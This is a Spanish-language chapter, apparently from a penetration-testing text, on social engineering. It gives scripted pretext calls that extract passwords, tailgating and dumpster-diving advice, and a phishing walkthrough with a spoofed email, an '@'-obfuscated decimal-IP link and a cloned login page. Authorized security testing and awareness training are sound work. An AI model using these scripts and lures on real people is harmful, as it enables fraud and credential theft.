REALIZACIN DE INGENIERA SOCIAL

Infosecurity Europe, llevo a cabo una encuesta a trabajadores de oficinas en Londres. Segn un artculo publicado por ZDNet el 20 de abril de 2004, el estudio descubri que las tres cuartas partes de los trabajadores encuestados estn dispuestos a revelar su contrasea de acceso a la red a cambio de una barra de chocolate. Este estudio demuestra lo fcil que es acceder a las redes sin tocar una sola pieza de equipo. Al final del da, no importa cunto de encriptacin y tecnologa de seguridad se haya puesto en prctica, una red nunca es completamente segura. Uno nunca puede deshacerse del eslabn ms dbil, el factor humano. No importa la tecnologa utilizada como firewalls, redes privadas virtuales (VPN), o dispositivos de encriptacin que tiene, si sus empleados estn dispuestos a dar acceso a los sistemas a cualquier persona que lo solicita. En la Prueba de Intrusin a menudo se pide a hacer precisamente esto, empleando tcticas de ingeniera social para descubrir si los empleados estn siguiendo las polticas internas y no revelan informacin sensible. Un ingeniero social es alguien que utiliza el engao, persuasin, y la influencia para obtener informacin que de otro modo no estar disponible. Existen dos tipos de ingeniera social: Basadas en la tecnologa Basadas en Humanos

La ingeniera social basada en la tecnologa, utiliza la tecnologa para engaar a los usuarios en dar informacin sensible. Un ejemplo clsico de una tecnologa basada en ataque es tener una ventana emergente en la computadora de un usuario y pedir su contrasea, como se demuestra en la Figura 4-1. Aqu el usuario es informado de que su sesin ha finalizado, y se le pedir que introduzca su nombre de usuario y contrasea nuevamente. Despus de que el usuario hace clic en el botn Enviar, el nombre de usuario y contrasea son enviadas al ordenador del hacker malicioso. El hacker malicioso puede utilizar esa informacin ms adelante para acceder a la red de la vctima.
Figura 4-1. Ejemplo de tecnologa basada en la ingeniera social

En cambio, la ingeniera social en base a humanos no emplea la tecnologa, sino que se hace en persona, o a travs de una llamada telefnica. Ambas tcnicas se basan en la comportamiento previsible del ser humano que quiere ayudar a otro ser humano.

La psicologa humana La ingeniera social, no trabaja con el hardware o software, pero si con el wetware. Wetware es el elemento humano de la informtica. La gente por naturaleza es muy confiada y el ingeniero social aprovecha esta ventaja. La Ingeniera social es esencialmente el arte de la persuasin. La psicologa social define siete tipos de persuasin: Basada en la Conformidad Basada en Lgica Basada en necesidad Basada en la Autoridad Basada en reciprocidad Basada en similitud Basada en Informacin

Persuasin por Conformidad La persuasin por conformidad depende de la presin de los pares. Si el persona victima cree que todo el mundo lo est haciendo, es probable que se conforme a hacer lo mismo. Ejemplo, un servicio de asistencia personal para obtener acceso a un ordenador:
Auditor: Hola, mi nombre es Juan, soy de la Mesa de Ayuda, y estoy llamando para hacer el mantenimiento rutinario en su sistema. Victima: De verdad? No he odo hablar que la asistencia a los usuarios realiza el mantenimiento rutinario en nuestros ordenadores. Auditor: S, hemos comenzado hacindolo el ltimo trimestre. Hemos venido haciendo para todos el personal. Acabo de terminar de hacer todas las computadoras en la regin noreste. De hecho, la mayora de ellos han informado una mejora significativa en la velocidad de su computadora. Victima: De verdad? Bueno, si los dems estn viendo mejores resultados, quiero ser una parte de ella, tambin. Qu tengo que hacer? Auditor: Oh, usted no tiene que hacer nada. Soy capaz de hacerlo todo a distancia, pero para ello, necesito tener acceso a su nombre de usuario y contrasea de VPN. Victima: Usted es capaz de hacerlo todo a distancia? Esto es increble! Bueno, mi nombre de usuario es jdoe, y mi contrasea es letmein. Auditor: Bien! Gracias por su ayuda. Voy por VPN a su ordenador y realizare nuestra rutina de mantenimiento. Esto tomara slo unos minutos.

En este punto, usted acaba de obtener el cdigo de acceso nombre y la contrasea del usuario para darle acceso a la red de la empresa. Persuasin basada en lgica La ingeniera social se basa en argumentos lgicos para obtener el acceso. Esto se consigue mejor mediante la presentacin del despliegue de declaraciones verdaderas seguidas por una conclusin que resulte en su favor. Por ejemplo, haciendo pasar por un servicio de asistencia tcnico, puede adquirir una contrasea a travs de la siguiente tcnica:
Auditor: Hola, soy Juan, y yo estoy con la mesa de ayuda. Como ustedes saben, la seguridad es una preocupacin importante para las redes de hoy. (Primera verdadera declaracin) Vctima: S, he ledo acerca de ello en todas partes. Es sorprendente cmo muchas redes son violadas, porque los administradores no protegen bien los sistemas. Auditor: Bueno, mi trabajo es asegurar que todos los sistemas estn protegidos por contraseas para garantizar la seguridad. Estoy convencido que desea asegurarse de que su computadora es segura, verdad? (segunda declaracin verdadera) Victima: Absolutamente. Auditor: Entonces, quiero asegurarme que usted est utilizando una contrasea segura para ello lo guiare para cambiar su contrasea y le dar un ejemplo de una contrasea segura (conclusin). Vamos a seguir adelante y hacer esto ahora. Presione Ctrl-Alt-Supr y haga clic en Cambiar Contrasea. Victima: Est bien. Auditor: Para su nueva contrasea, escriba ABC123. Al utilizar una combinacin de letras, nmeros y caracteres especiales, hemos hecho su contrasea difcil de adivinar. Comprende la idea ? Victima: S. Con qu frecuencia debo cambiar mi contrasea? Auditor: Bueno, acaba de cambiar, por lo que deben establecerse por un tiempo. Voy a llamar de nuevo dentro de unos meses, cuando es hora de cambiar de nuevo.

En este caso, declarando dos verdaderas, usted es capaz de presentar una conclusin. La vctima ya est de acuerdo en las dos declaraciones anteriores, por lo que es probable que de acuerdo a la tercera. Persuasin basada en la necesidad En general la gente quiere ayudar a otros seres humanos, por lo cual puede representar tener una necesidad, con el objetivo que la vctima usuario le ayude dndole una informacin. Un ejemplo clsico es llamar al Help Desk de una gran corporacin, presentndose como un nuevo empleado:
Auditor: hola, soy nuevo en ste trabajo y necesito algo de ayuda. Victima: Bueno, usted se comunico al lugar correcto. Cmo puedo ayudarlo? Auditor: Se supone que tengo que crear un informe e imprimirlo, pero no s mi nombre de usuario y contrasea. Victima: Cul es su nombre? Auditor: Es Juan Prez. Victima: Hmmm... no se encuentra en nuestro directorio. Ests seguro que crearon un nombre de usuario y contrasea para usted?

Auditor: No, mi jefe dice que todava no fue creada mi cuenta, pero esta es la primera vez que necesito mi cuenta de usuario para entrar en la red. Se puede configurar mi cuenta ahora? Victima: Lo sentimos, pero no puedo hacer eso sin la autorizacin de su supervisor. Auditor: Oh, mi supervisor entr en una reunin con un cliente. Se supone que tengo realizar la impresin de este informe para mostrar al cliente, y temo tener que interrumpir a mi supervisor durante esta importante reunin. Puede por favor ayudarme? acabo de comenzar aqu, y no quiero dar una mala impresin a mi jefe. Victima: Bueno, se supone que nosotros no.., pero supongo que puedo ayudarle. Tu nombre de usuario va a ser jperez, y su contrasea va a ser password123. Auditor: Gracias!

Cuando usted est haciendo ingeniera social basada en necesidades, el objetivo podra ser vacilante, al igual que el servicio de asistencia tcnica que se encontraba en el ejemplo anterior. Si esto sucede, se debe aumentar su respuesta emocional. Las personas son seres emocionales y, a menudo, no aplican las polticas de seguridad por ayudar a alguien si sienten una conexin emocional con la misma. En el ejemplo anterior, el Auditor hace una llamada a la desesperacin para que el asistente tcnico del Help Desk se solidarice y ayude. Persuasin basada en la autoridad Es un mtodo popular que ofrece grandes resultados. En este sentido, se disfraza como alguien en una posicin de autoridad. Esto es ms comnmente realizado por suplantacin de identidad de algn nivel ejecutivo de gestin, por ejemplo se consigue datos de una autoridad y se realiza el llamado:
Auditor: Hola, soy Juan Prez. Este es el Help Desk? Victima: S, seor. Cmo puedo ayudarlo? Auditor: Estoy tratando de marcar desde casa, pero no tengo conexin. Creo que suprimieron la configuracin existente. Qu necesito hacer para conseguir que funcione? Victima: Permtame usted guiarlo en su configuracin.

En este punto, el asistente tcnico del Help Desk proceder a guiar al Auditor a travs de los pasos para configurar la conectividad de acceso remoto. Ellos proporcionaran el nmero de telfono y, probablemente, el nombre de usuario y contrasea si se le pide. Si no es as, el Auditor har un llamado a la emocin de actuar molesto al Help Desk, lo que hace sentir al asistente tcnico que podra tener problemas con las autoridades si no brinda los datos. El Auditor ahora tiene acceso a la red de la empresa y tambin tiene acceso a datos sensibles.
Nota: Usted podra preguntarse cmo saber el nombre del ejecutivo cuando usted est fuera de la empresa. La mayora de pginas Web ofrecen informacin sobre los perfiles de cada uno de sus ejecutivos. A menudo, incluyen una foto. A partir de esta informacin, usted puede obtener el nombre, sexo y edad aproximada del ejecutivo. Usted slo necesita que alguien del mismo sexo y edad aproximada realice la llamada para suplantar a dicha autoridad. Debido a que la mayora del personal del Help Desk no habla con los ejecutivos a nivel de gestin sobre una base regular, probablemente no sera capaz de saber si la voz es diferente. Adems, las voces a travs de una lnea telefnica siempre tienen un sonido ligeramente diferente a la voz real de la persona, especialmente si se llama desde un telfono celular.

Persuasin basada en la reciprocidad La tcnica de reciprocidad implica pedir a alguien hacer un favor a usted a cambio de que a esa persona se realizara un favor en el futuro. A pesar de que parece que est haciendo a usted un favor, realmente no est haciendo tal cosa.

Un buen ejemplo de esto es cuando en la empresa punto-com se est moviendo a un nuevo centro de datos. El ingeniero social descubre esto porque la empresa emiti un comunicado de prensa al respecto. El ingeniero social espera fuera del edificio hasta que encuentra los empleados de oficina que desempeaban en la antigua ubicacin. l se ofrece a dar una mano a alguien que se desempea en los suministros. Cuando llegu a la puerta, que esta protegida por medio de un lector de tarjetas, explica que haba dejado su tarjeta en casa. Como realizo un favor a los empleados llevando los suministros, dejan que el ingeniero social entre en el edificio. Como todo el mundo ve al ingeniero social, nadie piensa dos veces sobre l, o sea no sospechan que busca informacin. Persuasin basada en la similitud Es otra tcnica que se utiliza a menudo en las ventas. Se trata de conocer los gustos y aficiones personales de nuestro objetivo, construyendo una relacin positiva con l. Por ejemplo, la mayora de las empresas disponen de una seccin designada para fumadores, puede pasar el rato en torno a esta zona hasta que alguien comience a fumar, luego entablase una conversacin y se trata de obtener toda la informacin posible del empleado:
Auditor: Tiene nios? Victima: S, tengo tres nios. Auditor: De verdad?! (se acta como si usted tendra muchas similitudes con el empleado.) Qu edad tienen? Victima: 9, 11 y 14. Auditor: Oh que casualidad, mis hijos tienen casi la misma edad, ellos tienen 10, 12 y 16 (No haga exactamente la misma coincidencia, porque puede parecer sospechoso.) Victima: Oh! Esa es una coincidencia.

Siguiendo esta tcnica, se va recolectando ms informacin, y en el transcurso de unos minutos se logra construir una relacin de amistad con esta persona. Esta tcnica se basa en la explotacin de la confianza de los dems. Persuasin basada en la informacin En esta tcnica, el ingeniero social brinda suficiente informacin para demostrar que lo que est hablando. Por ejemplo, puede presentarse en una empresa como una empresa de consultora informtica. Luego de discutir los protocolos de enrutamiento, listas de acceso, y dems informacin tcnica conocida slo por aquellos que trabajan con routers, la vctima puede creer en usted y ofrecerle el acceso a equipos. Perfiles de comportamiento Como ingeniero social, debe ser consciente de los diferentes perfiles de comportamiento, debido a que algunos perfiles son ms susceptibles de manipular. Uno de las ms comunes clasificaciones de comportamiento est en http://www.discprofile.com Los perfiles de comportamiento se dividen en cuatro clases: Los Dominantes: suelen tener un estilo de comportamiento dominante. Esta es la personalidad que le gusta hacerse cargo de las situaciones y se sienten amenazados si no tienen control. Estos pueden ser los tipos ms difciles de manipular.

Los Influenciables: es el tipo que le gusta los entornos sociales. Le gusta tomar caf y siempre est hablando y haciendo bromas. l aspira a ser el centro de atencin. l puede ser persuadido con las tcticas de ingeniera social mediante el uso de humor. Los de poca firmeza: de este tipo puede ser el ms fcil de manipular para obtener informacin. Apelando a las necesidades emocionales de esta persona es el enfoque ms eficaz. Los Prudentes: esta persona necesita saber todos los hechos. Este temperamento es tpicamente encontrado en la personal de programacin y departamentos tcnicos. El uso de persuasin basada en la informacin es un enfoque para que esta persona pueda crear un clima de confianza con usted.

Lo que se necesita para ser un ingeniero social Para tener xito en la ingeniera social, se necesitan los siguientes cuatro cualidades: 1) Tener Paciencia 2) Tener Confianza en si mismo 3) Poder crear clima de confianza 4) Tener conocimientos en informaciones necesarias A continuacin se desarrollan cada una de estas cualidades: 1) La paciencia en ingeniera social La paciencia es el rasgo ms importante. Muchos fracasan porque piden informacin antes de llegar a construir confianza con alguien. Un ingeniero social eficaz podra hacer varias llamadas telefnicas a la misma persona antes de solicitar la informacin que necesita. Siempre debe comenzar la conversacin con informacin no relevante. Por ejemplo, comparar los siguientes dos conversaciones. En el primer ejemplo, se pide demasiado rpido la informacin.
Auditor: Hola. Soy Valeria de la mesa de ayuda. Victima: Hola. Cmo puedo ayudarte? Auditor: Estamos actualizando nuestros registros y la necesito conocer su contrasea. Victima: Espere un segundo. No debo dar a conocer las contraseas. Quien es usted?

En el segundo ejemplo, se solicita informacin sin importancia para que el usuario no sospeche de los interrogatorios del Auditor.
Auditor: Hola. Soy Valeria de la mesa de ayuda. Victima: Hola. Cmo puedo ayudarte? Auditor: Estamos actualizando nuestros registros y necesita saber alguna informacin sobre su ordenador. Tiene usted una computadora porttil o de escritorio? Victima: Una de escritorio. Auditor: Podra leer para m el nmero de serie? Esta en el frente o en la parte superior.

Victima: 59991124. Auditor: muy bien. Podra decirme la versin de Microsoft Internet Explorer que utiliza? Para saber la versin debe de ir al men Ayuda y seleccionar Acerca de. Victima: 6.0.2900.2180 Auditor: bien. Y tienen un monitor de 15 o 17 pulgadas? Victima: 15 pulgadas. Auditor: Y usted todava est utilizando el nombre de usuario jcano? Victima: No, es juandiaz. Auditor: Bueno, voy a hacer una nota de ello. Y en cuanto a su contrasea, actualmente cual esta utilizando? Victima: Es johndoe123. Auditor: bien. Y tiene acceso a una impresora de red?, o tiene su propia impresora (Usted debe continuar la conversacin a partir de este momento a fin de no aparecer sospechas.)

Si el trabajador no dar a conocer la informacin de inmediato, no se d por vencido. En el ejemplo anterior, si el trabajador no da su contrasea y cita la poltica de la compaa, hay seguir intentando utilizando otras tcnicas como por ejemplo la basada en la necesidad. Si esto no funciona, siga haciendo preguntas para que no se vean sospechosas. Luego llame a otro empleado que podra no estar tan familiarizado con la poltica de la compaa. 2) La confianza en ingeniera social Una cualidad muy importante que debe tener un ingeniero social es la confianza. Si confa en si mismo, la gente va a confiar en usted. A todo el mundo le gusta rer, y si puede hacer que su objetivo pueda rer, usted tiene muchas probabilidades de poder obtener lo que necesita. Tambin el contacto visual y hablar en forma clara y tranquila son puntos importantes para lograr la persuasin.

Al igual que un jugador de ajedrez, siempre se debe estar un paso a delante del juego. Si est dentro de un edificio suplantando la identidad de un tcnico de telecomunicaciones que est para instalar un equipo y queda atrapado por un administrador de TI, debe saber cmo reaccionar. No revele que usted esta contratado para ejecutar ingeniera social, ya que las noticias viajan rpido, y esto limitar los nuevos ensayos. 3) El clima de confianza para ingeniera social Adems de tener paciencia y confianza en si mismo, usted tambin debe crear un clima de confianza con su objetivo. La reciprocidad y las tcnicas de similitud ayudan a crear confianza con los dems. Si est intentando realizar ingeniera social sobre una persona, usted debe prestar atencin al comportamiento fsico integral de la misma. Si su objetivo cruza los brazos, usted debera hacer lo mismo. Si se rasca la cabeza, usted debera hacer lo mismo. A esto se le llama tcnica de espejo, que es tipo no verbal de similitud tctica. Adems, si su objetivo comienza a ponerse de pie o sigue de paso, muestra un claro signo de que usted no est conectando con l o, peor an, se est convirtiendo en sospechoso por su interrogatorio. En ese momento, el mejor enfoque es generalmente el humor para que la persona se relaje. Asegrese de rer en voz alta, porque la risa es contagiosa. Ese simple hecho puede hacer que la otra persona pueda rer y relajarse (aunque l no cree que sus chistes sean graciosos).

A veces en ingeniera social el objetivo pierde la confianza con usted. l podra empezar a hacer preguntas como:
"me repite nuevamente quin es usted?," o, "en que empresa dice que estuvo?"

Si eso ocurre, se debe seguir hablando para permanecer en la conversacin, cambiando gradualmente el tema de discusin sobre el objetivo, realizando comentarios tales como:
"me gusta que bastante esa corbata es muy original"

Tambin se deben hacer preguntas acerca de la persona misma por ejemplo:

"qu te gusta hacer fuera del trabajo?"

Las personas a menudo gustan hablar de s mismos. Si pareciera que esta sospechando para desviar la atencin se puede hablar de si mismo. 4) El uso de conocimientos dentro de la ingeniera social El ltimo ingrediente para el xito de la ingeniera social es la posesin de conocimientos dentro de la empresa. Antes de empezar, se necesita el nombre de alguien en la empresa para contactar. Esto se puede obtener a menudo directamente de la web o mediante bsquedas en grupos de noticias internas. Una de las tcnicas para obtener el nombre de un miembro del personal de TI es llamar a la recepcionista y decir:
"Hola. Me acaban de hacer una entrevista telefnica con el gerente de TI, y supone que tengo que llamarlo, pero no recuerdo su nombre y me da vergenza pedirlo nuevamente, puede usted ayudarme? " .

Muchas empresas tienen una hora de comida y el personal puede tener credenciales con informacin nombre, rea y cargo. Tambin se puede sacar los nombres y nmero de telfono en las mismas listas que tienen anotadas las teclas de acceso rpido. Por la perforacin de diversas combinaciones de botones en su telfono, usted puede obtener una lista de varios empleados en la empresa. Muchas empresas requieren tarjetas de identificacin para acceder a un edificio. Cuando los empleados llegan, puede pasar detrs de otro empleado y entrar en el edificio, esto debe hacerse en horas picos en la cual el guardia de seguridad esta muy ocupado para registrar todo lo que pasa. Un punto importante es entrar en una conversacin con alguien de tal manera de parecer que es un empleado mas en da habitual de trabajo
Se debe reunir la mayor cantidad de informacin que pueda sobre la compaa. Nota: Tal vez la forma ms comn de recopilacin de informacin interna sobre una empresa es a travs de dumpster diving. Dumpster diving es la prctica de ir a travs de una empresa buscando papeles que puedan tener informacin sensible, tales como organigramas o estados financieros. Los empleados deben destruir estos documentos, pero por lo general slo los tiran a la basura. Es sorprendente la informacin que se puede conseguir.

Primeras impresiones y el Ingeniero Social El conocimiento de la empresa no siempre es suficiente, tambin se debe crear buena impresin con el objetivo. Esto se aplica al uso de ingeniera social, tanto a travs del telfono o en persona. Si utiliza el telfono, se debe asegurar de tener una conexin de calidad. Evitar el ruido o esttica.

Deshgase de las distracciones a tu alrededor, porque pueden arrojar fuera de su ritmo. Si va a suplantar la identidad de la persona y una profesin, como un portero o de personal de reparacin, usted puede ser que necesite un uniforme. La mayora de los uniformes estn disponibles en tiendas de vestuario. La gente est ms dispuesta a ofrecer ayuda a una persona del sexo opuesto. Asegrese de que usted emplea a hombres y mujeres en su equipo de pruebas de intrusin por esta razn. A menudo, un ingeniero social hace muchos viajes en un edificio antes de intentar acceder a la red corporativa. Algunas empresas incluso permiten a la gente a tomar tours de sus instalaciones, proporcionando el acceso libre para los ingenieros sociales a investigar el diseo del edificio. Muchas veces se puede ver lo que est en una sala de servidores, y en algunos pases se requiere tener una ventana en la habitacin de fuego como reglamento. Lo ms importante es tener confianza. Incluso si se pierde en un edificio, no debe verse como perdido.

Suplantacin de Soporte Tcnico Ahora que sabes lo que se necesita para ser un ingeniero social, se puede examinar diferentes ejemplos para obtener acceso a las redes de datos; los ms exitosos ingenieros sociales son los que pueden encontrar nuevas y creativas maneras de persuadir a otros a darles informacin. La primera, y ms comn, es la suplantacin de soporte tcnico. Aqu, se suplanta la identidad de un servicio de asistencia tcnica, que est tratando de obtener informacin, como una contrasea de un usuario incauto.
Auditor: Hola. Soy Juanl de servicio de soporte tcnico. Est notando una ralentizacin en su sistema? Victima: Bueno, no parece demasiado lento. Auditor: Hmmm ... Nos muestra significativa degradacin de la red. Bueno, permtame realizar unas pruebas en su PC. Su nombre de usuario es vuser, verdad? Victima: S!

Por lo general, el nombre de usuario es la misma que la direccin de correo electrnico. Por lo tanto, si la direccin de correo electrnico es vuser@somecompany.com, es probable que la cuenta en la red corporativa es vuser. Usted puede recoger direcciones de correo electrnico de la mayora de los sitios web de la empresa:
Auditor: Bien! Ahora ver su contrasea. Hmmm ... Nuestro sistema es muy lento ... Cul es su contrasea? Victima: Es SimplePassword. Auditor: Bueno, segn las pruebas parece estar todo bien. No debe estar afectando a los usuarios de su rea. Extrao. Bueno, debera seguir probando las dems reas. Gracias por su tiempo. Victima: encantado de ayudarle!

Este ejemplo muestra una simple suplantacin del soporte tcnico. En un mundo real, debe realizar mas preguntar al usuario, a fin de crear un clima de confianza con l, una buena medida es incorporar humor en la llamada.

Se debe probar que los usuarios remotos tengan conocimiento necesario de las polticas de seguridad, ya que a menudo, son ms susceptibles a las tcticas de ingeniera social porque estn fuera de la oficina. La parte ms difcil de este tipo de pruebas, sin embargo, es conseguir los nmeros de telfono de aquellos tele trabajadores. Pero se puede eludir este problema al hacerse pasar por un ejecutivo que necesita los nombres de los empleados que trabajan desde casa. Esto en s mismo no parece como una grave violacin de la confidencialidad, por lo que la mayora de los departamentos brindan esta informacin fcilmente, sobre todo si ellos creen que esta llamando un director ejecutivo. Desde all, puede utilizar la gua telefnica para buscar nombres.

Participacin de terceros en la suplantacin Uno de los inconvenientes para la suplantacin del servicio de ayuda es que es casi demasiado comn. Las empresas saben acerca de esta tcnica y su poltica sabe que no se les debe dar a conocer las contraseas a nadie. Otra tcnica, que tiene mucho ms xito en la obtencin de informacin interna, es por suplantacin con terceros. A travs de suplantacin con terceros, se puede obtener informacin sobre los tipos de equipos y programas informticos utilizados en una organizacin. El descubrimiento de esta informacin utilizando herramientas de software a veces puede ser la parte ms larga de cualquier Prueba de intrusin. Es mucho ms fcil entrar y pedir informacin a sus administradores de red y los administradores de TI. Puede hacer esto llamando y hacindose pasar por un vendedor:
Auditor: Hola. Yo soy de la consultora XXX y quisiera informarle a usted acerca de nuestro nuevo producto de cortafuegos. Victima: Ya estamos bastante satisfechos con lo que tenemos. Auditor: De verdad? Qu tipo de firewall est usted corriendo? Victima: Estamos utilizando un PIX y un firewall NetScreen. Auditor: Bueno, estoy seguro de que los dos son excelentes productos, pero deben ser conscientes de los peligros de ataques de denegacin de servicio como smurfs y ping de la muerte. Sus firewalls protegen contra este tipo de ataques? Victima: Por supuesto. Auditor: Muy bien, nuestro producto tambin puede hacer un filtrado especial para proteger su servidor de correo electrnico. Sus productos tienen proteccin para su servidor de correo electrnico? Victima: Eso no es una preocupacin para nosotros porque no permitimos que los mensajes de correo electrnico desde Internet. Todo viene de nuestra sede corporativa. Auditor: Bueno, suena como que est satisfecho con su actual producto. No quiero hacerle perder ms de su tiempo. Quiero dejar mi nmero de telfono y nombre en caso de que usted decida consultarnos. (Proceda a dejar un nombre falso y nmero de telfono.)

Usted puede ver en este breve ejemplo que usted puede descubrir el tipo de cortafuegos y parte de su configuracin. Usted sabe que esta empresa probablemente bloquea o limita el trfico de ICMP (por el protocolo utilizado en smurf y ping de la muerte). Usted tambin sabe que el puerto TCP 25 (puerto usado por e-mail), es inaccesible a travs de Internet. Esto ahorra tiempo tratando de buscar por estos protocolos y correr el riesgo de ser detectado.

Usando el telfono no es la nica manera de hacer suplantacin con terceros. Tambin puede realizarse en persona. Por ejemplo:
Una vez ingresado en una cooperativa de crdito hacindose pasar por un tcnico de computadoras. Informe al cajero que haba sido llamado por la empresa porque el servidor estaba teniendo problemas y yo estaba all para solucionarlo. El cajero me acompaa a lo largo de los ascensores y accedo con su tarjeta de acceso, fui hasta la segunda planta restringida, donde se encuentra el centro de datos, llegando a la entrada de la recepcionista. (Esta prueba ya se haba acordado con el administrador de TI, que a propsito haba dejado el edificio en este da para ver cmo su equipo responda a la ingeniera social.) Cuando inform a la recepcionista que yo estaba all para trabajar en el servidor, me dijo que el administrador de TI estaba fuera y que no se le dijo acerca de que ingresara un tcnico. Ella me pregunt si poda volver al da siguiente. Despus le dije que cobro por hora y que me tarde dos horas de viaje y sera un importante suma si tuviera que conducir de vuelta y regresar al da siguiente, entonces ella decide que pase y me acompaa hasta el centro de datos. El centro de datos est protegido. Tena dos puertas con un dispositivo de lector de tarjetas y una hoja de registro para todos los visitantes. Me sorprendi descubrir que ella tena acceso a entrar en el centro de datos. Ella abri las puertas, y yo caminaba directamente en el centro de datos, sin comprobar mi identificacin o validacin de mi propsito para estar all. Lo nico que hizo fue decirme que ella no tena las contraseas para los servidores. Le dije que no sera un problema. (Una simple herramienta de craqueo seria suficiente.) Conclusin: En pocos minutos se descubri todos los dispositivos de seguridad en el centro de datos. Despus se tuvo la oportunidad de acceder a los servidores con una simple contrasea. Usted puede imaginar la conmocin del gerente de TI cuando descubre que se puede lograr acceder a la informacin de la compaa con tal facilidad.

Otro ejemplo es de actuar como si estuviera con una revista que est haciendo una revisin sobre el producto de la empresa. La mayora de los empleados estn ansiosos de saber que podra ser citado en una revista. Es por ello que el personal de relaciones pblicas siempre debe estar presente durante la entrevista y muestra de productos, y la identidad del entrevistador de la revista debe ser verificada. Puede sorprender descubrir hasta qu punto la informacin un administrador de TI est dispuesto a dar su opinin cuando se lo entrevista acerca de su seguridad de los datos:
Auditor: Estoy impresionado con las medidas que ha adoptado para garantizar su infraestructura. (Adulacin es el primer paso para abrir la puerta para ms informacin.) Victima: Gracias. Aqu en la empresa XYZ, nos tomamos muy en serio la seguridad. Auditor: que puedo decir. Ahora, su empresa garantiza el cumplimiento de cualquier tipo de polticas de seguridad? Victima: Oh, por supuesto. Tenemos una aceptable poltica de uso de Internet y una poltica de contraseas para todos los usuarios. Auditor: Dgame ms, que es muy interesante. Victima: Bueno, nuestra poltica de contraseas, por ejemplo, exige a todos los usuarios a crear contraseas que son al menos ocho caracteres de longitud y contener tanto letras como nmeros. Ellos estn obligados a cambiarla cada tres meses.

Auditor: Fascinante. Ahora, he escuchado historias de que cuando las empresas aplican este tipo de polticas, los usuarios podran escribir sus contraseas en notas y colocarlas en sus teclados. Tiene usted algn problema de ese tipo en su empresa? Victima: (risas) Oh, s, todo el tiempo. Queremos detener eso, pero apuesto que un 50 por ciento de nuestros usuarios tienen sus contraseas escritas en algn lugar de su escritorio.

Esta breve entrevista revel que la forma ms sencilla de obtener acceso en la red de la empresa sera buscar contraseas en los escritorios de los usuarios. Podra entrar en el edificio al final del da y pedir a usar el bao. Despus de la hora de cierre (y antes de que llegue el personal de limpieza), puede salir del bao y pasear por la oficina mientras mira los escritorios para tener

acceso a las contraseas. Suplantacin por E-mail El E-mail es tambin un medio viable de extraer informacin de personas inocentes. Es fcil enviar un e-mail falso con la direccin del remitente falso, como se demuestra en el siguiente ejemplo:
From: Visa Credit credit@visacredit.com To: xxxx@hotmail.com Date: Wed, July 5th, 2005 04:11:03 -0500 Subject: Visa Credit Check Reply-To: Visa Credit Service credit@visacredit.com Received: from mx.chi.a.com (mx.wash.a.com[10.1.2.3]) by mailserver1.wash.a.com with SMTP id A93AABVQ35A for xxxx@hotmail.com (sender thief@hackmynetwork.com); Wed, July 5th, 2005 03:09:01 -0500 (EST) X-Mailer: Microsoft Outlook Express 6.00.2800.1158 MIME-Version: 1.0 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MAIL-INFO: 4316792387897d34b9877 X-ContentStamp: 2:3:1818012451 Return-Path: thief@hackmynetwork.com Message-ID: < A93AABVQ35A@mx.chi.a.com>

El siguiente ejemplo muestra el inicio de la creacin de una cabecera de un falso e-mail. _______________________________________________________
Importancia: ALTA Servicios de Microsoft Hotmail. Debido a las recientes preocupaciones en materia de seguridad, Para mejorar todos nuestros servidores se esta implementando un nuevo mecanismo de autentificacin. Esto exige a todos los usuarios cambiar sus contraseas para acceder al nuevo mecanismo de autenticacin. El mismo se llevara a cabo el 1 de diciembre de 2008. Todo suscriptor que no ha cambiado su contrasea utilizando el enlace a continuacin no ser capaz de acceder a los servicios de Hotmail. 1. Usted tendr que cambiar su contrasea de e-mail, desde el da 31 de mayo de 2008. Para hacerlo, por favor acceder a esta URL: http://www.microsoft.com/passport/hotmail/login.asp@333868852 /login.asp 2. Por favor, deje al menos 5 minutos para que su cuenta pueda ser registrada y actualizada. 3. Si tiene cualquier problema de acceso debido a este cambio de contrasea, por favor intente el proceso de nuevo ms tarde. Nos disculpamos por cualquier inconveniente que esto pueda haber causado. Esperamos que usted comprenda. Estamos haciendo este cambio para su beneficio y es parte de nuestro continuo esfuerzo para mejorar los servicios de Microsoft Hotmail.

Atentamente, Bob Smith Director Ejecutivo de la seguridad de Hotmail Microsoft Hotmail apoyo http://www.microsoft.com _____________________________________________________________

Despus de que el destinatario hace clic en el enlace contenido en el correo electrnico, se dirige a la pgina web que se muestra en la Figura 4-2. El receptor entonces entra su cdigo de acceso y contrasea, pero en lugar de enviar esa informacin a Microsoft, la informacin es enviada por correo electrnico.

Figura 4-2. Website para Extraer informacin

En primer lugar, se utiliza un e-mail spoofer (programa para crear un falso e-mail). Luego se enviar el e-mail al destinatario asegurndose de realizar un e-mail con firma que suene autntica. En segundo lugar, incluir un enlace que redireccione al usuario a su sitio web. En el ejemplo anterior, la URL es http://www.microsoft.com/passport/hotmail/login.asp@ 333868852/login.asp.

El enlace codificado en Base-10 figura despus del smbolo @. Cuando se utiliza un smbolo @, todo el contenido antes es ignorado. En este ejemplo, entonces, la parte inicial de la relacin es un autntico vnculo con el servicio de Microsoft Hotmail, pero el smbolo @ hace que el navegador web haga caso omiso de l y sea enviado a la URL real de 333868852/login.asp. Para crear una URL codificada, comenzar con la direccin IP. En este ejemplo, el receptor es enviada al sitio web ubicado en la direccin IP 19.230.111.52. Para codificar esta direccin IP, haga lo siguiente:
1. Tomar el primer octeto y multiplicar por 256 elevado a la 3, o 16777216. 19 * 16.777.216 = 318.767.104 2. Tomar el segundo octeto y multiplicar por 256 elevado a la 2, o 65536. 230 * 65.536 = 15.073.280 3. Tomar el tercer octeto y multiplicar por 256. 111 * 256 = 28.416 4. Tomar los tres nmeros y aadirlos al ltimo octeto. 318767104 + 15073280 + 28416 + 52 = 333868852 (total)

Este total se convierte en una URL codificada en base-10 (http://333868852). As que en lugar de ir al sitio web de Microsoft, el receptor se enva a http://333868852/login.asp. Y ahora, puede crear una pgina web similar a la verdadera pgina web. Puede descargar el contenido original sitio web usando software como el rastreador WinHTTrack Website Copier. (Ver Figura 4-3.) Luego se debe modificar el cdigo fuente de manera que el botn "Enviar" enve el formulario a la ubicacin de su servidor web o por correo electrnico a su cuenta.
Figura 4-3. WinHTTrack Website Copier

